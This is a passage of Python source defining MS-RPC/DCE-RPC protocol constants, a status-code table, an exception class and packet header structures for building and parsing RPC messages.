MSRPC_CANCELACK = 0x0A
MSRPC_BIND	  = 0x0B
MSRPC_BINDACK   = 0x0C
MSRPC_BINDNAK   = 0x0D
MSRPC_ALTERCTX  = 0x0E
MSRPC_ALTERCTX_R= 0x0F
MSRPC_AUTH3	 = 0x10
MSRPC_SHUTDOWN  = 0x11
MSRPC_CO_CANCEL = 0x12
MSRPC_ORPHANED  = 0x13

# MS/RPC Packet Flags
PFC_FIRST_FRAG	 = 0x01
PFC_LAST_FRAG	  = 0x02

# For PDU types bind, bind_ack, alter_context, and
# alter_context_resp, this flag MUST be interpreted as PFC_SUPPORT_HEADER_SIGN
MSRPC_SUPPORT_SIGN  = 0x04

#For the
#remaining PDU types, this flag MUST be interpreted as PFC_PENDING_CANCEL.
MSRPC_PENDING_CANCEL= 0x04

PFC_RESERVED_1	  = 0x08
PFC_CONC_MPX		= 0x10
PFC_DID_NOT_EXECUTE = 0x20
PFC_MAYBE		   = 0x40
PFC_OBJECT_UUID	 = 0x80

# Auth Types - Security Providers
RPC_C_AUTHN_NONE		  = 0x00
RPC_C_AUTHN_GSS_NEGOTIATE = 0x09
RPC_C_AUTHN_WINNT		 = 0x0A
RPC_C_AUTHN_GSS_SCHANNEL  = 0x0E
RPC_C_AUTHN_GSS_KERBEROS  = 0x10
RPC_C_AUTHN_NETLOGON	  = 0x44
RPC_C_AUTHN_DEFAULT	   = 0xFF

# Auth Levels
RPC_C_AUTHN_LEVEL_NONE		  = 1
RPC_C_AUTHN_LEVEL_CONNECT	   = 2
RPC_C_AUTHN_LEVEL_CALL		  = 3
RPC_C_AUTHN_LEVEL_PKT		   = 4
RPC_C_AUTHN_LEVEL_PKT_INTEGRITY = 5
RPC_C_AUTHN_LEVEL_PKT_PRIVACY   = 6

#Reasons for rejection of a context element, included in bind_ack result reason
rpc_provider_reason = {
	0	   : 'reason_not_specified',
	1	   : 'abstract_syntax_not_supported',
	2	   : 'proposed_transfer_syntaxes_not_supported',
	3	   : 'local_limit_exceeded',
	4	   : 'protocol_version_not_specified',
	8	   : 'authentication_type_not_recognized',
	9	   : 'invalid_checksum'
}

MSRPC_CONT_RESULT_ACCEPT = 0
MSRPC_CONT_RESULT_USER_REJECT = 1
MSRPC_CONT_RESULT_PROV_REJECT = 2

#Results of a presentation context negotiation
rpc_cont_def_result = {
	0	   : 'acceptance',
	1	   : 'user_rejection',
	2	   : 'provider_rejection'
}

#status codes, references:
#https://docs.microsoft.com/windows/desktop/Rpc/rpc-return-values
#https://msdn.microsoft.com/library/default.asp?url=/library/en-us/randz/protocol/common_return_values.asp
#winerror.h
#https://www.opengroup.org/onlinepubs/9629399/apdxn.htm

rpc_status_codes = {
	0x00000005 : 'rpc_s_access_denied',
	0x00000008 : 'Authentication type not recognized',
	0x000006D8 : 'rpc_fault_cant_perform', 
	0x000006C6 : 'rpc_x_invalid_bound',				# the arrays bound are invalid
	0x000006E4 : 'rpc_s_cannot_support: The requested operation is not supported.',			   # some operation is not supported
	0x000006F7 : 'rpc_x_bad_stub_data',				# the stub data is invalid, doesn't match with the IDL definition
	0x1C010001 : 'nca_s_comm_failure',				 # unable to get response from server:
	0x1C010002 : 'nca_s_op_rng_error',				 # bad operation number in call
	0x1C010003 : 'nca_s_unk_if',					   # unknown interface
	0x1C010006 : 'nca_s_wrong_boot_time',			  # client passed server wrong server boot time
	0x1C010009 : 'nca_s_you_crashed',				  # a restarted server called back a client
	0x1C01000B : 'nca_s_proto_error',				  # someone messed up the protocol
	0x1C010013 : 'nca_s_out_args_too_big ',			# output args too big
	0x1C010014 : 'nca_s_server_too_busy',			  # server is too busy to handle call
	0x1C010015 : 'nca_s_fault_string_too_long',		# string argument longer than declared max len
	0x1C010017 : 'nca_s_unsupported_type ',			# no implementation of generic operation for object
	0x1C000001 : 'nca_s_fault_int_div_by_zero',
	0x1C000002 : 'nca_s_fault_addr_error ',
	0x1C000003 : 'nca_s_fault_fp_div_zero',
	0x1C000004 : 'nca_s_fault_fp_underflow',
	0x1C000005 : 'nca_s_fault_fp_overflow',
	0x1C000006 : 'nca_s_fault_invalid_tag',
	0x1C000007 : 'nca_s_fault_invalid_bound ',
	0x1C000008 : 'nca_s_rpc_version_mismatch',
	0x1C000009 : 'nca_s_unspec_reject ',
	0x1C00000A : 'nca_s_bad_actid',
	0x1C00000B : 'nca_s_who_are_you_failed',
	0x1C00000C : 'nca_s_manager_not_entered ',
	0x1C00000D : 'nca_s_fault_cancel',
	0x1C00000E : 'nca_s_fault_ill_inst',
	0x1C00000F : 'nca_s_fault_fp_error',
	0x1C000010 : 'nca_s_fault_int_overflow',
	0x1C000012 : 'nca_s_fault_unspec',
	0x1C000013 : 'nca_s_fault_remote_comm_failure ',
	0x1C000014 : 'nca_s_fault_pipe_empty ',
	0x1C000015 : 'nca_s_fault_pipe_closed',
	0x1C000016 : 'nca_s_fault_pipe_order ',
	0x1C000017 : 'nca_s_fault_pipe_discipline',
	0x1C000018 : 'nca_s_fault_pipe_comm_error',
	0x1C000019 : 'nca_s_fault_pipe_memory',
	0x1C00001A : 'nca_s_fault_context_mismatch ',
	0x1C00001B : 'nca_s_fault_remote_no_memory ',
	0x1C00001C : 'nca_s_invalid_pres_context_id',
	0x1C00001D : 'nca_s_unsupported_authn_level',
	0x1C00001F : 'nca_s_invalid_checksum ',
	0x1C000020 : 'nca_s_invalid_crc',
	0x1C000021 : 'nca_s_fault_user_defined',
	0x1C000022 : 'nca_s_fault_tx_open_failed',
	0x1C000023 : 'nca_s_fault_codeset_conv_error',
	0x1C000024 : 'nca_s_fault_object_not_found ',
	0x1C000025 : 'nca_s_fault_no_client_stub',
	0x16c9a000 : "rpc_s_mod",
	0x16c9a001 : "rpc_s_op_rng_error",
	0x16c9a002 : "rpc_s_cant_create_socket",
	0x16c9a003 : "rpc_s_cant_bind_socket",
	0x16c9a004 : "rpc_s_not_in_call",
	0x16c9a005 : "rpc_s_no_port",
	0x16c9a006 : "rpc_s_wrong_boot_time",
	0x16c9a007 : "rpc_s_too_many_sockets",
	0x16c9a008 : "rpc_s_illegal_register",
	0x16c9a009 : "rpc_s_cant_recv",
	0x16c9a00a : "rpc_s_bad_pkt",
	0x16c9a00b : "rpc_s_unbound_handle",
	0x16c9a00c : "rpc_s_addr_in_use",
	0x16c9a00d : "rpc_s_in_args_too_big",
	0x16c9a00e : "rpc_s_string_too_long",
	0x16c9a00f : "rpc_s_too_many_objects",
	0x16c9a010 : "rpc_s_binding_has_no_auth",
	0x16c9a011 : "rpc_s_unknown_authn_service",
	0x16c9a012 : "rpc_s_no_memory",
	0x16c9a013 : "rpc_s_cant_nmalloc",
	0x16c9a014 : "rpc_s_call_faulted",
	0x16c9a015 : "rpc_s_call_failed",
	0x16c9a016 : "rpc_s_comm_failure",
	0x16c9a017 : "rpc_s_rpcd_comm_failure",
	0x16c9a018 : "rpc_s_illegal_family_rebind",
	0x16c9a019 : "rpc_s_invalid_handle",
	0x16c9a01a : "rpc_s_coding_error",
	0x16c9a01b : "rpc_s_object_not_found",
	0x16c9a01c : "rpc_s_cthread_not_found",
	0x16c9a01d : "rpc_s_invalid_binding",
	0x16c9a01e : "rpc_s_already_registered",
	0x16c9a01f : "rpc_s_endpoint_not_found",
	0x16c9a020 : "rpc_s_invalid_rpc_protseq",
	0x16c9a021 : "rpc_s_desc_not_registered",
	0x16c9a022 : "rpc_s_already_listening",
	0x16c9a023 : "rpc_s_no_protseqs",
	0x16c9a024 : "rpc_s_no_protseqs_registered",
	0x16c9a025 : "rpc_s_no_bindings",
	0x16c9a026 : "rpc_s_max_descs_exceeded",
	0x16c9a027 : "rpc_s_no_interfaces",
	0x16c9a028 : "rpc_s_invalid_timeout",
	0x16c9a029 : "rpc_s_cant_inq_socket",
	0x16c9a02a : "rpc_s_invalid_naf_id",
	0x16c9a02b : "rpc_s_inval_net_addr",
	0x16c9a02c : "rpc_s_unknown_if",
	0x16c9a02d : "rpc_s_unsupported_type",
	0x16c9a02e : "rpc_s_invalid_call_opt",
	0x16c9a02f : "rpc_s_no_fault",
	0x16c9a030 : "rpc_s_cancel_timeout",
	0x16c9a031 : "rpc_s_call_cancelled",
	0x16c9a032 : "rpc_s_invalid_call_handle",
	0x16c9a033 : "rpc_s_cannot_alloc_assoc",
	0x16c9a034 : "rpc_s_cannot_connect",
	0x16c9a035 : "rpc_s_connection_aborted",
	0x16c9a036 : "rpc_s_connection_closed",
	0x16c9a037 : "rpc_s_cannot_accept",
	0x16c9a038 : "rpc_s_assoc_grp_not_found",
	0x16c9a039 : "rpc_s_stub_interface_error",
	0x16c9a03a : "rpc_s_invalid_object",
	0x16c9a03b : "rpc_s_invalid_type",
	0x16c9a03c : "rpc_s_invalid_if_opnum",
	0x16c9a03d : "rpc_s_different_server_instance",
	0x16c9a03e : "rpc_s_protocol_error",
	0x16c9a03f : "rpc_s_cant_recvmsg",
	0x16c9a040 : "rpc_s_invalid_string_binding",
	0x16c9a041 : "rpc_s_connect_timed_out",
	0x16c9a042 : "rpc_s_connect_rejected",
	0x16c9a043 : "rpc_s_network_unreachable",
	0x16c9a044 : "rpc_s_connect_no_resources",
	0x16c9a045 : "rpc_s_rem_network_shutdown",
	0x16c9a046 : "rpc_s_too_many_rem_connects",
	0x16c9a047 : "rpc_s_no_rem_endpoint",
	0x16c9a048 : "rpc_s_rem_host_down",
	0x16c9a049 : "rpc_s_host_unreachable",
	0x16c9a04a : "rpc_s_access_control_info_inv",
	0x16c9a04b : "rpc_s_loc_connect_aborted",
	0x16c9a04c : "rpc_s_connect_closed_by_rem",
	0x16c9a04d : "rpc_s_rem_host_crashed",
	0x16c9a04e : "rpc_s_invalid_endpoint_format",
	0x16c9a04f : "rpc_s_unknown_status_code",
	0x16c9a050 : "rpc_s_unknown_mgr_type",
	0x16c9a051 : "rpc_s_assoc_creation_failed",
	0x16c9a052 : "rpc_s_assoc_grp_max_exceeded",
	0x16c9a053 : "rpc_s_assoc_grp_alloc_failed",
	0x16c9a054 : "rpc_s_sm_invalid_state",
	0x16c9a055 : "rpc_s_assoc_req_rejected",
	0x16c9a056 : "rpc_s_assoc_shutdown",
	0x16c9a057 : "rpc_s_tsyntaxes_unsupported",
	0x16c9a058 : "rpc_s_context_id_not_found",
	0x16c9a059 : "rpc_s_cant_listen_socket",
	0x16c9a05a : "rpc_s_no_addrs",
	0x16c9a05b : "rpc_s_cant_getpeername",
	0x16c9a05c : "rpc_s_cant_get_if_id",
	0x16c9a05d : "rpc_s_protseq_not_supported",
	0x16c9a05e : "rpc_s_call_orphaned",
	0x16c9a05f : "rpc_s_who_are_you_failed",
	0x16c9a060 : "rpc_s_unknown_reject",
	0x16c9a061 : "rpc_s_type_already_registered",
	0x16c9a062 : "rpc_s_stop_listening_disabled",
	0x16c9a063 : "rpc_s_invalid_arg",
	0x16c9a064 : "rpc_s_not_supported",
	0x16c9a065 : "rpc_s_wrong_kind_of_binding",
	0x16c9a066 : "rpc_s_authn_authz_mismatch",
	0x16c9a067 : "rpc_s_call_queued",
	0x16c9a068 : "rpc_s_cannot_set_nodelay",
	0x16c9a069 : "rpc_s_not_rpc_tower",
	0x16c9a06a : "rpc_s_invalid_rpc_protid",
	0x16c9a06b : "rpc_s_invalid_rpc_floor",
	0x16c9a06c : "rpc_s_call_timeout",
	0x16c9a06d : "rpc_s_mgmt_op_disallowed",
	0x16c9a06e : "rpc_s_manager_not_entered",
	0x16c9a06f : "rpc_s_calls_too_large_for_wk_ep",
	0x16c9a070 : "rpc_s_server_too_busy",
	0x16c9a071 : "rpc_s_prot_version_mismatch",
	0x16c9a072 : "rpc_s_rpc_prot_version_mismatch",
	0x16c9a073 : "rpc_s_ss_no_import_cursor",
	0x16c9a074 : "rpc_s_fault_addr_error",
	0x16c9a075 : "rpc_s_fault_context_mismatch",
	0x16c9a076 : "rpc_s_fault_fp_div_by_zero",
	0x16c9a077 : "rpc_s_fault_fp_error",
	0x16c9a078 : "rpc_s_fault_fp_overflow",
	0x16c9a079 : "rpc_s_fault_fp_underflow",
	0x16c9a07a : "rpc_s_fault_ill_inst",
	0x16c9a07b : "rpc_s_fault_int_div_by_zero",
	0x16c9a07c : "rpc_s_fault_int_overflow",
	0x16c9a07d : "rpc_s_fault_invalid_bound",
	0x16c9a07e : "rpc_s_fault_invalid_tag",
	0x16c9a07f : "rpc_s_fault_pipe_closed",
	0x16c9a080 : "rpc_s_fault_pipe_comm_error",
	0x16c9a081 : "rpc_s_fault_pipe_discipline",
	0x16c9a082 : "rpc_s_fault_pipe_empty",
	0x16c9a083 : "rpc_s_fault_pipe_memory",
	0x16c9a084 : "rpc_s_fault_pipe_order",
	0x16c9a085 : "rpc_s_fault_remote_comm_failure",
	0x16c9a086 : "rpc_s_fault_remote_no_memory",
	0x16c9a087 : "rpc_s_fault_unspec",
	0x16c9a088 : "uuid_s_bad_version",
	0x16c9a089 : "uuid_s_socket_failure",
	0x16c9a08a : "uuid_s_getconf_failure",
	0x16c9a08b : "uuid_s_no_address",
	0x16c9a08c : "uuid_s_overrun",
	0x16c9a08d : "uuid_s_internal_error",
	0x16c9a08e : "uuid_s_coding_error",
	0x16c9a08f : "uuid_s_invalid_string_uuid",
	0x16c9a090 : "uuid_s_no_memory",
	0x16c9a091 : "rpc_s_no_more_entries",
	0x16c9a092 : "rpc_s_unknown_ns_error",
	0x16c9a093 : "rpc_s_name_service_unavailable",
	0x16c9a094 : "rpc_s_incomplete_name",
	0x16c9a095 : "rpc_s_group_not_found",
	0x16c9a096 : "rpc_s_invalid_name_syntax",
	0x16c9a097 : "rpc_s_no_more_members",
	0x16c9a098 : "rpc_s_no_more_interfaces",
	0x16c9a099 : "rpc_s_invalid_name_service",
	0x16c9a09a : "rpc_s_no_name_mapping",
	0x16c9a09b : "rpc_s_profile_not_found",
	0x16c9a09c : "rpc_s_not_found",
	0x16c9a09d : "rpc_s_no_updates",
	0x16c9a09e : "rpc_s_update_failed",
	0x16c9a09f : "rpc_s_no_match_exported",
	0x16c9a0a0 : "rpc_s_entry_not_found",
	0x16c9a0a1 : "rpc_s_invalid_inquiry_context",
	0x16c9a0a2 : "rpc_s_interface_not_found",
	0x16c9a0a3 : "rpc_s_group_member_not_found",
	0x16c9a0a4 : "rpc_s_entry_already_exists",
	0x16c9a0a5 : "rpc_s_nsinit_failure",
	0x16c9a0a6 : "rpc_s_unsupported_name_syntax",
	0x16c9a0a7 : "rpc_s_no_more_elements",
	0x16c9a0a8 : "rpc_s_no_ns_permission",
	0x16c9a0a9 : "rpc_s_invalid_inquiry_type",
	0x16c9a0aa : "rpc_s_profile_element_not_found",
	0x16c9a0ab : "rpc_s_profile_element_replaced",
	0x16c9a0ac : "rpc_s_import_already_done",
	0x16c9a0ad : "rpc_s_database_busy",
	0x16c9a0ae : "rpc_s_invalid_import_context",
	0x16c9a0af : "rpc_s_uuid_set_not_found",
	0x16c9a0b0 : "rpc_s_uuid_member_not_found",
	0x16c9a0b1 : "rpc_s_no_interfaces_exported",
	0x16c9a0b2 : "rpc_s_tower_set_not_found",
	0x16c9a0b3 : "rpc_s_tower_member_not_found",
	0x16c9a0b4 : "rpc_s_obj_uuid_not_found",
	0x16c9a0b5 : "rpc_s_no_more_bindings",
	0x16c9a0b6 : "rpc_s_invalid_priority",
	0x16c9a0b7 : "rpc_s_not_rpc_entry",
	0x16c9a0b8 : "rpc_s_invalid_lookup_context",
	0x16c9a0b9 : "rpc_s_binding_vector_full",
	0x16c9a0ba : "rpc_s_cycle_detected",
	0x16c9a0bb : "rpc_s_nothing_to_export",
	0x16c9a0bc : "rpc_s_nothing_to_unexport",
	0x16c9a0bd : "rpc_s_invalid_vers_option",
	0x16c9a0be : "rpc_s_no_rpc_data",
	0x16c9a0bf : "rpc_s_mbr_picked",
	0x16c9a0c0 : "rpc_s_not_all_objs_unexported",
	0x16c9a0c1 : "rpc_s_no_entry_name",
	0x16c9a0c2 : "rpc_s_priority_group_done",
	0x16c9a0c3 : "rpc_s_partial_results",
	0x16c9a0c4 : "rpc_s_no_env_setup",
	0x16c9a0c5 : "twr_s_unknown_sa",
	0x16c9a0c6 : "twr_s_unknown_tower",
	0x16c9a0c7 : "twr_s_not_implemented",
	0x16c9a0c8 : "rpc_s_max_calls_too_small",
	0x16c9a0c9 : "rpc_s_cthread_create_failed",
	0x16c9a0ca : "rpc_s_cthread_pool_exists",
	0x16c9a0cb : "rpc_s_cthread_no_such_pool",
	0x16c9a0cc : "rpc_s_cthread_invoke_disabled",
	0x16c9a0cd : "ept_s_cant_perform_op",
	0x16c9a0ce : "ept_s_no_memory",
	0x16c9a0cf : "ept_s_database_invalid",
	0x16c9a0d0 : "ept_s_cant_create",
	0x16c9a0d1 : "ept_s_cant_access",
	0x16c9a0d2 : "ept_s_database_already_open",
	0x16c9a0d3 : "ept_s_invalid_entry",
	0x16c9a0d4 : "ept_s_update_failed",
	0x16c9a0d5 : "ept_s_invalid_context",
	0x16c9a0d6 : "ept_s_not_registered",
	0x16c9a0d7 : "ept_s_server_unavailable",
	0x16c9a0d8 : "rpc_s_underspecified_name",
	0x16c9a0d9 : "rpc_s_invalid_ns_handle",
	0x16c9a0da : "rpc_s_unknown_error",
	0x16c9a0db : "rpc_s_ss_char_trans_open_fail",
	0x16c9a0dc : "rpc_s_ss_char_trans_short_file",
	0x16c9a0dd : "rpc_s_ss_context_damaged",
	0x16c9a0de : "rpc_s_ss_in_null_context",
	0x16c9a0df : "rpc_s_socket_failure",
	0x16c9a0e0 : "rpc_s_unsupported_protect_level",
	0x16c9a0e1 : "rpc_s_invalid_checksum",
	0x16c9a0e2 : "rpc_s_invalid_credentials",
	0x16c9a0e3 : "rpc_s_credentials_too_large",
	0x16c9a0e4 : "rpc_s_call_id_not_found",
	0x16c9a0e5 : "rpc_s_key_id_not_found",
	0x16c9a0e6 : "rpc_s_auth_bad_integrity",
	0x16c9a0e7 : "rpc_s_auth_tkt_expired",
	0x16c9a0e8 : "rpc_s_auth_tkt_nyv",
	0x16c9a0e9 : "rpc_s_auth_repeat",
	0x16c9a0ea : "rpc_s_auth_not_us",
	0x16c9a0eb : "rpc_s_auth_badmatch",
	0x16c9a0ec : "rpc_s_auth_skew",
	0x16c9a0ed : "rpc_s_auth_badaddr",
	0x16c9a0ee : "rpc_s_auth_badversion",
	0x16c9a0ef : "rpc_s_auth_msg_type",
	0x16c9a0f0 : "rpc_s_auth_modified",
	0x16c9a0f1 : "rpc_s_auth_badorder",
	0x16c9a0f2 : "rpc_s_auth_badkeyver",
	0x16c9a0f3 : "rpc_s_auth_nokey",
	0x16c9a0f4 : "rpc_s_auth_mut_fail",
	0x16c9a0f5 : "rpc_s_auth_baddirection",
	0x16c9a0f6 : "rpc_s_auth_method",
	0x16c9a0f7 : "rpc_s_auth_badseq",
	0x16c9a0f8 : "rpc_s_auth_inapp_cksum",
	0x16c9a0f9 : "rpc_s_auth_field_toolong",
	0x16c9a0fa : "rpc_s_invalid_crc",
	0x16c9a0fb : "rpc_s_binding_incomplete",
	0x16c9a0fc : "rpc_s_key_func_not_allowed",
	0x16c9a0fd : "rpc_s_unknown_stub_rtl_if_vers",
	0x16c9a0fe : "rpc_s_unknown_ifspec_vers",
	0x16c9a0ff : "rpc_s_proto_unsupp_by_auth",
	0x16c9a100 : "rpc_s_authn_challenge_malformed",
	0x16c9a101 : "rpc_s_protect_level_mismatch",
	0x16c9a102 : "rpc_s_no_mepv",
	0x16c9a103 : "rpc_s_stub_protocol_error",
	0x16c9a104 : "rpc_s_class_version_mismatch",
	0x16c9a105 : "rpc_s_helper_not_running",
	0x16c9a106 : "rpc_s_helper_short_read",
	0x16c9a107 : "rpc_s_helper_catatonic",
	0x16c9a108 : "rpc_s_helper_aborted",
	0x16c9a109 : "rpc_s_not_in_kernel",
	0x16c9a10a : "rpc_s_helper_wrong_user",
	0x16c9a10b : "rpc_s_helper_overflow",
	0x16c9a10c : "rpc_s_dg_need_way_auth",
	0x16c9a10d : "rpc_s_unsupported_auth_subtype",
	0x16c9a10e : "rpc_s_wrong_pickle_type",
	0x16c9a10f : "rpc_s_not_listening",
	0x16c9a110 : "rpc_s_ss_bad_buffer",
	0x16c9a111 : "rpc_s_ss_bad_es_action",
	0x16c9a112 : "rpc_s_ss_wrong_es_version",
	0x16c9a113 : "rpc_s_fault_user_defined",
	0x16c9a114 : "rpc_s_ss_incompatible_codesets",
	0x16c9a115 : "rpc_s_tx_not_in_transaction",
	0x16c9a116 : "rpc_s_tx_open_failed",
	0x16c9a117 : "rpc_s_partial_credentials",
	0x16c9a118 : "rpc_s_ss_invalid_codeset_tag",
	0x16c9a119 : "rpc_s_mgmt_bad_type",
	0x16c9a11a : "rpc_s_ss_invalid_char_input",
	0x16c9a11b : "rpc_s_ss_short_conv_buffer",
	0x16c9a11c : "rpc_s_ss_iconv_error",
	0x16c9a11d : "rpc_s_ss_no_compat_codeset",
	0x16c9a11e : "rpc_s_ss_no_compat_charsets",
	0x16c9a11f : "dce_cs_c_ok",
	0x16c9a120 : "dce_cs_c_unknown",
	0x16c9a121 : "dce_cs_c_notfound",
	0x16c9a122 : "dce_cs_c_cannot_open_file",
	0x16c9a123 : "dce_cs_c_cannot_read_file",
	0x16c9a124 : "dce_cs_c_cannot_allocate_memory",
	0x16c9a125 : "rpc_s_ss_cleanup_failed",
	0x16c9a126 : "rpc_svc_desc_general",
	0x16c9a127 : "rpc_svc_desc_mutex",
	0x16c9a128 : "rpc_svc_desc_xmit",
	0x16c9a129 : "rpc_svc_desc_recv",
	0x16c9a12a : "rpc_svc_desc_dg_state",
	0x16c9a12b : "rpc_svc_desc_cancel",
	0x16c9a12c : "rpc_svc_desc_orphan",
	0x16c9a12d : "rpc_svc_desc_cn_state",
	0x16c9a12e : "rpc_svc_desc_cn_pkt",
	0x16c9a12f : "rpc_svc_desc_pkt_quotas",
	0x16c9a130 : "rpc_svc_desc_auth",
	0x16c9a131 : "rpc_svc_desc_source",
	0x16c9a132 : "rpc_svc_desc_stats",
	0x16c9a133 : "rpc_svc_desc_mem",
	0x16c9a134 : "rpc_svc_desc_mem_type",
	0x16c9a135 : "rpc_svc_desc_dg_pktlog",
	0x16c9a136 : "rpc_svc_desc_thread_id",
	0x16c9a137 : "rpc_svc_desc_timestamp",
	0x16c9a138 : "rpc_svc_desc_cn_errors",
	0x16c9a139 : "rpc_svc_desc_conv_thread",
	0x16c9a13a : "rpc_svc_desc_pid",
	0x16c9a13b : "rpc_svc_desc_atfork",
	0x16c9a13c : "rpc_svc_desc_cma_thread",
	0x16c9a13d : "rpc_svc_desc_inherit",
	0x16c9a13e : "rpc_svc_desc_dg_sockets",
	0x16c9a13f : "rpc_svc_desc_timer",
	0x16c9a140 : "rpc_svc_desc_threads",
	0x16c9a141 : "rpc_svc_desc_server_call",
	0x16c9a142 : "rpc_svc_desc_nsi",
	0x16c9a143 : "rpc_svc_desc_dg_pkt",
	0x16c9a144 : "rpc_m_cn_ill_state_trans_sa",
	0x16c9a145 : "rpc_m_cn_ill_state_trans_ca",
	0x16c9a146 : "rpc_m_cn_ill_state_trans_sg",
	0x16c9a147 : "rpc_m_cn_ill_state_trans_cg",
	0x16c9a148 : "rpc_m_cn_ill_state_trans_sr",
	0x16c9a149 : "rpc_m_cn_ill_state_trans_cr",
	0x16c9a14a : "rpc_m_bad_pkt_type",
	0x16c9a14b : "rpc_m_prot_mismatch",
	0x16c9a14c : "rpc_m_frag_toobig",
	0x16c9a14d : "rpc_m_unsupp_stub_rtl_if",
	0x16c9a14e : "rpc_m_unhandled_callstate",
	0x16c9a14f : "rpc_m_call_failed",
	0x16c9a150 : "rpc_m_call_failed_no_status",
	0x16c9a151 : "rpc_m_call_failed_errno",
	0x16c9a152 : "rpc_m_call_failed_s",
	0x16c9a153 : "rpc_m_call_failed_c",
	0x16c9a154 : "rpc_m_errmsg_toobig",
	0x16c9a155 : "rpc_m_invalid_srchattr",
	0x16c9a156 : "rpc_m_nts_not_found",
	0x16c9a157 : "rpc_m_invalid_accbytcnt",
	0x16c9a158 : "rpc_m_pre_v2_ifspec",
	0x16c9a159 : "rpc_m_unk_ifspec",
	0x16c9a15a : "rpc_m_recvbuf_toosmall",
	0x16c9a15b : "rpc_m_unalign_authtrl",
	0x16c9a15c : "rpc_m_unexpected_exc",
	0x16c9a15d : "rpc_m_no_stub_data",
	0x16c9a15e : "rpc_m_eventlist_full",
	0x16c9a15f : "rpc_m_unk_sock_type",
	0x16c9a160 : "rpc_m_unimp_call",
	0x16c9a161 : "rpc_m_invalid_seqnum",
	0x16c9a162 : "rpc_m_cant_create_uuid",
	0x16c9a163 : "rpc_m_pre_v2_ss",
	0x16c9a164 : "rpc_m_dgpkt_pool_corrupt",
	0x16c9a165 : "rpc_m_dgpkt_bad_free",
	0x16c9a166 : "rpc_m_lookaside_corrupt",
	0x16c9a167 : "rpc_m_alloc_fail",
	0x16c9a168 : "rpc_m_realloc_fail",
	0x16c9a169 : "rpc_m_cant_open_file",
	0x16c9a16a : "rpc_m_cant_read_addr",
	0x16c9a16b : "rpc_svc_desc_libidl",
	0x16c9a16c : "rpc_m_ctxrundown_nomem",
	0x16c9a16d : "rpc_m_ctxrundown_exc",
	0x16c9a16e : "rpc_s_fault_codeset_conv_error",
	0x16c9a16f : "rpc_s_no_call_active",
	0x16c9a170 : "rpc_s_cannot_support",
	0x16c9a171 : "rpc_s_no_context_available",
}

class DCERPCException(Exception):
	"""
	This is the exception every client should catch regardless of the underlying
	DCERPC Transport used.
	"""
	def __init__(self, error_string=None, error_code=None, packet=None):
		"""
		:param string error_string: A string you want to show explaining the exception. Otherwise the default ones will be used
		:param integer error_code: the error_code if we're using a dictionary with error's descriptions
		:param NDR packet: if successfully decoded, the NDR packet of the response call. This could probably have useful
		information
		"""
		Exception.__init__(self)
		self.packet = packet
		self.error_string = error_string
		if packet is not None:
			try:
				self.error_code = packet['ErrorCode']
			except:
				self.error_code = error_code
		else:
			self.error_code = error_code

	def get_error_code( self ):
		return self.error_code
 
	def get_packet( self ):
		return self.packet

	def __str__( self ):
		key = self.error_code
		if self.error_string is not None:
			return self.error_string
		if key in rpc_status_codes:
			error_msg_short = rpc_status_codes[key]
			return 'DCERPC Runtime Error: code: 0x%x - %s ' % (self.error_code, error_msg_short)
		else:
			return 'DCERPC Runtime Error: unknown error code: 0x%x' % self.error_code

# Context Item
class CtxItem(Structure):
	structure = (
		('ContextID','<H=0'),
		('TransItems','B=0'),
		('Pad','B=0'),
		('AbstractSyntax','20s=""'),
		('TransferSyntax','20s=""'),
	)

class CtxItemResult(Structure):
	structure = (
		('Result','<H=0'),
		('Reason','<H=0'),
		('TransferSyntax','20s=""'),
	)

class SEC_TRAILER(Structure):
	commonHdr = (
		('auth_type', 'B=10'),
		('auth_level','B=0'),
		('auth_pad_len','B=0'),
		('auth_rsvrd','B=0'),
		('auth_ctx_id','<L=747920'),
	)

class MSRPCHeader(Structure):
	_SIZE = 16
	commonHdr = ( 
		('ver_major','B=5'),				# 0
		('ver_minor','B=0'),				# 1
		('type','B=0'),						# 2
		('flags','B=0'),					# 3
		('representation','<L=0x10'),		# 4
		('frag_len','<H=self._SIZE+len(auth_data)+(16 if (self["flags"] & 0x80) > 0 else 0)+len(pduData)+len(pad)+len(sec_trailer)'),  # 8
		('auth_len','<H=len(auth_data)'),	# 10
		('call_id','<L=1'),					# 12	<-- Common up to here (including this)
	)

	structure = ( 
		('dataLen','_-pduData','self["frag_len"]-self["auth_len"]-self._SIZE-(8 if self["auth_len"] > 0 else 0)'),
		('pduData',':'),								
		('_pad', '_-pad','(4 - ((self._SIZE + (16 if (self["flags"] & 0x80) > 0 else 0) + len(self["pduData"])) & 3) & 3)'),
		('pad', ':'),
		('_sec_trailer', '_-sec_trailer', '8 if self["auth_len"] > 0 else 0'),
		('sec_trailer',':'),
		('auth_dataLen','_-auth_data','self["auth_len"]'),
		('auth_data',':'),
	)

	def __init__(self, data = None, alignment = 0):
		Structure.__init__(self,data, alignment)
		if data is None:
			self['ver_major'] = 5
			self['ver_minor'] = 0
			self['flags'] = PFC_FIRST_FRAG | PFC_LAST_FRAG
			self['type'] = MSRPC_REQUEST
			self.__frag_len_set = 0
			self['auth_len'] = 0
			self['pduData'] = b''
			self['auth_data'] = b''
			self['sec_trailer'] = b''
			self['pad'] = b''

	def get_header_size(self):
		return self._SIZE + (16 if (self["flags"] & PFC_OBJECT_UUID) > 0 else 0)

	def get_packet(self):
		if self['auth_data'] != b'':
			self['auth_len'] = len(self['auth_data'])
		# The sec_trailer structure MUST be 4-byte aligned with respect to 
		# the beginning of the PDU. Padding octets MUST be used to align the 
		# sec_trailer structure if its natural beginning is not already 4-byte aligned
		##self['pad'] = '\xAA' * (4 - ((self._SIZE + len(self['pduData'])) & 3) & 3)

		return self.getData()

class MSRPCRequestHeader(MSRPCHeader):
	_SIZE = 24
	commonHdr = MSRPCHeader.commonHdr + ( 
		('alloc_hint','<L=0'),							# 16
		('ctx_id','<H=0'),								# 20
		('op_num','<H=0'),								# 22
		('_uuid','_-uuid','16 if self["flags"] & 0x80 > 0 else 0' ), # 22
		('uuid',':'),								# 22
	)

	def __init__(self, data = None, alignment = 0):
		MSRPCHeader.__init__(self, data, alignment)
		if data is None:
			self['type'] = MSRPC_REQUEST
			self['ctx_id'] = 0
			self['uuid'] = b''

class MSRPCRespHeader(MSRPCHeader):
	_SIZE = 24
	commonHdr = MSRPCHeader.commonHdr + ( 
		('alloc_hint','<L=0'),						  # 16   
		('ctx_id','<H=0'),							  # 20
		('cancel_count','<B=0'),						# 22
		('padding','<B=0'),							 # 23
	)

	def __init__(self, aBuffer = None, alignment = 0):
		MSRPCHeader.__init__(self, aBuffer, alignment)
		if aBuffer is None:
			self['type'] = MSRPC_RESPONSE
